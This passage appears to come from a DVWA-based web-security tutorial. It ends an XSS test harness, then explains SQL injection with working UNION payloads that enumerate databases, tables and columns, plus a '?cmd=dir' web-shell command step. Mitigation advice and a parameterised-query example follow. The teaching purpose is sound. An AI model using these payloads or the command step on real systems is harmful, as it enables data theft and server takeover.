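    """Isolate the user-controlled region of the constructed template."""
    return rendered_page.split("<p>", 1)[1].rsplit("</p>", 1)[0]


def contains_active_markup(rendered_page):
    """True if the user-controlled part of the page still holds live tags or handlers."""
    return ACTIVE_MARKUP.search(user_part(rendered_page)) is not None


if __name__ == "__main__":
    for name, render in (("low", render_low), ("medium", render_medium), ("high", render_high)):
        for payload in (SCRIPT_PAYLOAD, IFRAME_PAYLOAD, CASE_VARIANT):
            print(f"{name:6} {payload[:24]:24} active={contains_active_markup(render(payload))}")
```

The medium renderer neutralises exactly the one payload the text says it does and nothing else; the encoded output of render_high contains no "<" at all, which is why output encoding, not tag removal, is the fix the OWASP guidance above points to.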
2. SQL Injection
a) What is SQL Injection?
SQL Injection is one of the web hacking techniques that is becoming increasingly common. By injecting SQL queries or commands into the input before it is handed to the web application, we can log in without a username and password, execute commands remotely, dump data and obtain root on the SQL server. The attack tool is any web browser, such as Internet Explorer, Firefox or Google Chrome.
The # sign is used to neutralise the final quote (') in the SQL query: SELECT first_name, last_name FROM users WHERE user_id = '$user_id' To show the database name: a' UNION select 1, database();#
To show all database names together with the tables in the MySQL DBMS: a' UNION select table_schema, table_name from information_schema.tables;#
We can add a WHERE condition to narrow the result: a' UNION select table_schema, table_name from information_schema.tables where table_schema='dvwa';#
To list the columns of a table: a' UNION select table_name, column_name from information_schema.columns where table_schema='dvwa';#
Once it has been created, we only need to run the command in the browser, appended after the string ?cmd=command. For example, 192.168.10.20/sqlinjection.php?cmd=dir gives us:
Change the default password of the root user.
Remove all stored procedures that are present on the server by default.
Filter potentially harmful characters such as ' , " , : and # as soon as a query request arrives from outside.
Update SQL to the latest releases.
Block SQL-sensitive keywords with a firewall right at the input.
Encrypt passwords.
Strip the keywords SELECT, DELETE, INSERT, ... from queries coming from outside.
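Filtering quotes and stripping keywords, as several items in the list above suggest, are blacklists that can be bypassed; the control that actually separates data from SQL is the parameterised query. The Python below is an added example, not from the original document or from DVWA: it reproduces the user_id lookup quoted earlier once by string concatenation and once with a bound parameter, and feeds both the table-enumeration payload from this section. An in-memory SQLite database stands in for DVWA's MySQL, so the MySQL comment # becomes SQLite's -- and information_schema.tables becomes the sqlite_master catalogue; the users and secrets rows are constructed sample data.

```python
"""String-built SQL beside the parameterised query (added example)."""
import re
import sqlite3

# Payload adapted from the text's enumeration of information_schema.tables.
CATALOGUE_PAYLOAD = "a' UNION SELECT name, type FROM sqlite_master--"


def build_db():
    """Constructed schema mirroring DVWA's users table plus a table that should stay hidden."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT);
        INSERT INTO users VALUES ('1', 'admin', 'admin'), ('2', 'Gordon', 'Brown');
        CREATE TABLE secrets (owner TEXT, note TEXT);
        INSERT INTO secrets VALUES ('admin', 'constructed secret');
    """)
    return db


def lookup_vulnerable(db, user_id):
    """DVWA 'low' style: the input is concatenated into the statement text."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(query).fetchall()


def lookup_safe(db, user_id):
    """Parameterised query: the driver passes the input as a value, never as SQL."""
    return db.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def is_valid_user_id(user_id):
    """Defence in depth: allow-list the expected shape instead of blacklisting quotes."""
    return re.fullmatch(r"[0-9]{1,9}", user_id) is not None


if __name__ == "__main__":
    db = build_db()
    print("normal lookup, both versions:", lookup_vulnerable(db, "1"), lookup_safe(db, "1"))
    print("payload through concatenation:", lookup_vulnerable(db, CATALOGUE_PAYLOAD))
    print("payload through bound parameter:", lookup_safe(db, CATALOGUE_PAYLOAD))
    print("payload passes allow-list:", is_valid_user_id(CATALOGUE_PAYLOAD))
```

The concatenated version answers the payload with the names of every table in the catalogue, which is the enumeration step shown in this section; the parameterised version simply looks for a user whose id is the whole payload string and returns nothing.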